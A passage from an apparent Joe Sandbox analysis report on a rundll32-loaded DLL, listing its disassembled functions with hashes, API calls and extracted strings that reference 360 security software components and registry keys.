                                                                  • Opcode Fuzzy Hash: 9d5beebac642680a506550c8be48c190e39914ceb82cb04c52bb84f1375e2870
                                                                  • Instruction Fuzzy Hash: 6F514B32614A8882FBA3DB20EC443DA3361F78D7C9F859125E59A47AA5EF2DC74DC740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018004872C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 318COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _cwprintf_s_l$??3@CountHeapProcessStringTickmemmoverandsrand
                                                                  • String ID: %d=%s$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%spid=%s
                                                                  • API String ID: 2740332460-2247268028
                                                                  • Opcode ID: 48d86df3b5eac7e439a35ff4fd84f198e4b1e974b1358ce155bcc0297089f372
                                                                  • Instruction ID: 80426b886386f52412969e15ba132e6e65bce95777886caa6ce0aa64614bcf94
                                                                  • Opcode Fuzzy Hash: 48d86df3b5eac7e439a35ff4fd84f198e4b1e974b1358ce155bcc0297089f372
                                                                  • Instruction Fuzzy Hash: 5FD1C172305F4886EB51DB29E88039E73A0FB88BE8F158625AE5D077A5DF78C549C704
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018004F018 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 116COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsicmp_wcsnicmp$wcsstr
                                                                  • String ID: Software\Classes\Wow6432Node$Software\Classes\Wow6432Node\$Software\Wow6432Node$Software\Wow6432Node\$Wow6432Node$Wow6432Node\$wow6432node
                                                                  • API String ID: 4199785700-2224805171
                                                                  • Opcode ID: bc25291bcc814f054e7e10840494f54f48fde9230fe93c8f0d5c0c6b2b3ad0be
                                                                  • Instruction ID: 173969ce7e51924b4f06bf421c606f91b3afd6de77e358442d966ae2f37bd097
                                                                  • Opcode Fuzzy Hash: bc25291bcc814f054e7e10840494f54f48fde9230fe93c8f0d5c0c6b2b3ad0be
                                                                  • Instruction Fuzzy Hash: 55517371710E48C1EBA6DB29D8843B923A1B789BE4F46C215EA39437E4DF68CB4CC745
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180014138 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FilePath$AppendExistsModuleNamememset$CriticalSection$EnterLeave
                                                                  • String ID: ..\360SkinMgr.exe$..\360sd.exe$..\safemon\360Cactus.tpi
                                                                  • API String ID: 2738204422-1657815065
                                                                  • Opcode ID: 78597d9bd975c32090d8355579ef8ffe821f8875940c9f43dd2c1350df723c28
                                                                  • Instruction ID: 05d3995d6e5afe1b7f2ff7eb98ba3dbe6d41cc5d548c72c66593806649a32fef
                                                                  • Opcode Fuzzy Hash: 78597d9bd975c32090d8355579ef8ffe821f8875940c9f43dd2c1350df723c28
                                                                  • Instruction Fuzzy Hash: 0E417131614A8D82EBE69B21EC953EA27A4F79D784F80C055F99E476A5DF2DC30DCB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018004C3C8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 187COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AppendFileModuleNamePathmemset
                                                                  • String ID: ..\360bps.dat$//lsp/fnp$//lsp/fnpw
                                                                  • API String ID: 1620117007-629564897
                                                                  • Opcode ID: 8b88fd5d987282aa7e8cbcbc9338ad7a6d43f93b19f4f5ae7e83081502dc9fb0
                                                                  • Instruction ID: 9751cd454638bcc7bf23e097769634142843b259acdcdf6531404e40a8ce2858
                                                                  • Opcode Fuzzy Hash: 8b88fd5d987282aa7e8cbcbc9338ad7a6d43f93b19f4f5ae7e83081502dc9fb0
                                                                  • Instruction Fuzzy Hash: FF918431209B8882EAD2CF15E8847DDB7A4F7887D4F418116EA9943BA9DF7CC64DCB01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018000E07C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 163filetimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFileSection$EnterLeavefreemallocmemset$CloseCreateHandleReadSizeTime
                                                                  • String ID: D063$|
                                                                  • API String ID: 1613485820-3743183194
                                                                  • Opcode ID: 180749bbb112b904ef6176165a202792b4826eb4bf0b5cc93a95b31eeb2a1677
                                                                  • Instruction ID: 1c0486e52071ce2fa8a0c36d95268ac158065e3f2ce4ac4886627ad722c994ab
                                                                  • Opcode Fuzzy Hash: 180749bbb112b904ef6176165a202792b4826eb4bf0b5cc93a95b31eeb2a1677
                                                                  • Instruction Fuzzy Hash: 0A61AF327016588AFBD6CFA5E9457A873E9B70DBD8F008025EE0957BA8DF34C649C711
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180056C84 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AppendPathmemset$CriticalFileModuleNameSectionValue_wcsicmp$EnterLeave
                                                                  • String ID: Partner$PartnerName$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$pid
                                                                  • API String ID: 264253324-3445957450
                                                                  • Opcode ID: af17b70cf5ba9092bea16f3f380d13b2d21a94489603b21e2ef55527860ed742
                                                                  • Instruction ID: 89340431e1bc531ff063a600718ea9f8068e08b94321d1f6c16d494f9f8bead4
                                                                  • Opcode Fuzzy Hash: af17b70cf5ba9092bea16f3f380d13b2d21a94489603b21e2ef55527860ed742
                                                                  • Instruction Fuzzy Hash: 98319A32A00A4896FBA29F21AC443D967A0F74D7E4F808615FD68576E8DF79C78DC350
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018004808C Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 252COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@rand$??3@CountCriticalHeapInitializeProcessSectionTickmemsetsrand
                                                                  • String ID: 360safe$WifiCheckQuery$http://%s/wcheckquery$wificheck$wificheck:1
                                                                  • API String ID: 2719022499-1298750920
                                                                  • Opcode ID: ba48bf925f8ff20436e767d0bb5c933ca5c9980a21313222aabcab8ee4652180
                                                                  • Instruction ID: c937e0c4e90421d2c820d9f7251a3693a618876eb833e6d48c240cb9fefbc629
                                                                  • Opcode Fuzzy Hash: ba48bf925f8ff20436e767d0bb5c933ca5c9980a21313222aabcab8ee4652180
                                                                  • Instruction Fuzzy Hash: 31A19E72201F0891EA96DF29D8443DD33A0FB49BE8F558625EA6D077D1EF78C689C344
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180066608 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Close$Open$QueryValue$PathProcess$AddressAppendCommandCurrentExistsFileFreeHandleLibraryLineProcTokenmemsetwcsstr
                                                                  • String ID: /elevated$SOFTWARE\360Safe\360Ent$ServiceCall
                                                                  • API String ID: 3868077243-983453937
                                                                  • Opcode ID: e8e6a48d377b8b947be7de055ef0add81918a1ec871415dff66262798b1d0c29
                                                                  • Instruction ID: 15e9288aeb9452e37e9dffc63771de1b8c488dcb05314bb0ab77bc9e2c882ef0
                                                                  • Opcode Fuzzy Hash: e8e6a48d377b8b947be7de055ef0add81918a1ec871415dff66262798b1d0c29
                                                                  • Instruction Fuzzy Hash: 1C514F72B00B188AFB919F65DC847DC33B5BB48BA8F148125EE2A536A5DF34CA49C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180002308 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 102libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCurrentFolderFromHandleListLocationMallocModulePathProcProcessSpecialwcsstr
                                                                  • String ID: (x86)$IsWow64Process$Kernel32.dll$\SysWOW64$\System32
                                                                  • API String ID: 3215350457-2087702655
                                                                  • Opcode ID: bf72767515c204881d1f258e158e1a3830e9824de3f932ee163774af780d841d
                                                                  • Instruction ID: 20fdff06134b497470b840b0dc70d8e75aaa21696b334e6b55e82bb231538848
                                                                  • Opcode Fuzzy Hash: bf72767515c204881d1f258e158e1a3830e9824de3f932ee163774af780d841d
                                                                  • Instruction Fuzzy Hash: 58411C7120574882FB96DB65EC543E932A0BB8DBE0F55C226A9A9477A5DF38C74DC300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00000001800448C4 Relevance: 19.8, APIs: 13, Instructions: 310memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$String$EnterLeave$AllocByte$CountFreeTickrandsrand
                                                                  • String ID:
                                                                  • API String ID: 2388112003-0
                                                                  • Opcode ID: 601ce5742b1ae8d3f199bb9b56dc9d4efdb3fb2238afb3afbe88db3bb5de28ba
                                                                  • Instruction ID: ae2396e8f272108b73aaedae01213fa34c0c0a48780782be1cf856f1cb9becad
                                                                  • Opcode Fuzzy Hash: 601ce5742b1ae8d3f199bb9b56dc9d4efdb3fb2238afb3afbe88db3bb5de28ba
                                                                  • Instruction Fuzzy Hash: D7C1A133711E4986FB86CF6598843ED23A0F748BE8F498215EE295B794DF34CA49C344
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018001D0C0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 268COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharDesktopFolderMultiWidememset
                                                                  • String ID: http://$https://
                                                                  • API String ID: 1422489264-1916535328
                                                                  • Opcode ID: de9a4066b55c8b133cdd0dae303f7afe18fb76f4c5fbd75c36adb4105bce4e56
                                                                  • Instruction ID: c30af850ed793d6246f4afeb4f6cdbd0e11f44053fb96dbf7aad71616760a46c
                                                                  • Opcode Fuzzy Hash: de9a4066b55c8b133cdd0dae303f7afe18fb76f4c5fbd75c36adb4105bce4e56
                                                                  • Instruction Fuzzy Hash: E0D17C72610A8C92FBA2DF25D8807D977A1F759BE4F44C212EA69476E4DF78C788C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180060B20 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 113libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0000000180062148: memset.MSVCRT ref: 000000018006217C
                                                                    • Part of subcall function 0000000180062148: GetModuleFileNameW.KERNEL32 ref: 0000000180062193
                                                                    • Part of subcall function 0000000180062148: PathCombineW.SHLWAPI ref: 00000001800621AA
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621DB
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621EF
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062203
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062217
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006222B
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006223F
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062253
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062267
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006227B
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006228F
                                                                  • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060B9F
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BD7
                                                                  • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BF2
                                                                  • GetModuleFileNameExW.PSAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C0E
                                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C1F
                                                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C2F
                                                                  • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C4A
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C76
                                                                  • SysFreeString.OLEAUT32 ref: 0000000180060C89
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModuleOpenProcess$CloseFileName$CombineFreePathStringmemset
                                                                  • String ID: Kernel32.dll$QueryFullProcessImageNameW
                                                                  • API String ID: 930578061-1170590071
                                                                  • Opcode ID: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
                                                                  • Instruction ID: 54324c73b988387a6f6bb080a4d890c873d93734858c8758c4fce1d00ab0755c
                                                                  • Opcode Fuzzy Hash: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
                                                                  • Instruction Fuzzy Hash: AD418231B01F089AE751CBA2EC04BDD72A2BB4DBD4F548524EE69637A4DF388619C344
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180078A30 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 197COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _errno$?terminate@@C_specific_handlerabortfreeiswctype
                                                                  • String ID: csm$f
                                                                  • API String ID: 3008409500-629598281
                                                                  • Opcode ID: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
                                                                  • Instruction ID: 7b0f8dd17277ba6112c52f93bbbd1643d611d3ff89c652db72cc518acb6e3753
                                                                  • Opcode Fuzzy Hash: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
                                                                  • Instruction Fuzzy Hash: 1D819172781B0889FBA6DFA490503EC23E0EF4C7D8F048515FA5917BC9DE3A8A599321
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 000000018004A39C Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 158COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AuthorityCountCurrentExecuteProcessShellWindow$CreateErrorFindForegroundInformationInitializeInstanceLastQueryServiceTickTokenUnknown_memsetsrandwcsstr
                                                                  • String ID: Progman$Program manager$http://$open$p
                                                                  • API String ID: 1516062321-2122229248
                                                                  • Opcode ID: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
                                                                  • Instruction ID: 5854d287d17234f5949c9620cb83c855c738d658d9246579e802d6f7b8ceff8d
                                                                  • Opcode Fuzzy Hash: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
                                                                  • Instruction Fuzzy Hash: A971A672209F8981FBA19B29D4913DE7360F7C97F4F058326BA6942AD5DF38C648C744
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000000180056400 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 142registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
                                                                  • String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360EDRSensor.exe$safemon\360EDRSensor.exe
                                                                  • API String ID: 1838183957-848848004
                                                                  • Opcode ID: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
                                                                  • Instruction ID: 12369466515329e4b94078003e01a8293ee627d21bf6a1b54a8e48e621231722
                                                                  • Opcode Fuzzy Hash: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
                                                                  • Instruction Fuzzy Hash: F9617132614A4886EBA1DF25E8543DA73A4FB8C7E4F408215BAAD437E5DF39C749CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

